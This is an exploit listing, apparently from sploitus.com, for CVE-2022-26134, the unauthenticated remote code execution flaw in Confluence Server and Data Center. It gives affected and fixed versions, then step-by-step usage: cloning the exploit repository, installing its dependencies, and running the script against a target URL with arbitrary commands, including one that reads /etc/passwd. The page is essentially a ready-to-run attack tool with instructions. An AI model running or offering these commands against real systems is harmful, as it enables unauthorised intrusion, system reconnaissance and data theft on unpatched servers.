Share
## https://sploitus.com/exploit?id=94DD467E-7BFF-5F8A-810C-3B1BDD195F6A
### CVE-2022-26134

Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability




| Summary |CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability <br> in Confluence Server and Data Center|
|---|---|
|Affected Products | Confluence Confluence Server Confluence Data Center|
|Affected Versions | All supported versions of Confluence Server and Data Center are affected.<br /> Confluence Server and Data Center versions after 1.3.0 are affected.|
|Fixed Versions | 7.4.17 <br /> 7.13.7 <br/> 7.14.3<br> 7.15.2<br/> 7.16.4 <br/> 7.17.4<br/> 7.18.1


### How to use:

Clone the repository :
```bash
git clone https://github.com/nxtexploit/CVE-2022-26134 ; cd CVE-2022-26134 ; pip install -r requirements.txt
```

### For executing command on vulnerable target :

```python
python3 CVE-2022-26134.py https://target.com type-command-here
python3 CVE-2022-26134.py https://target.com "uname -a"
python3 CVE-2022-26134.py https://target.com "cat /etc/passwd"
python3 CVE-2022-26134.py https://target.com  id
```

![voter-co-Trim.gif](https://i.imgur.com/6kK2VES.png)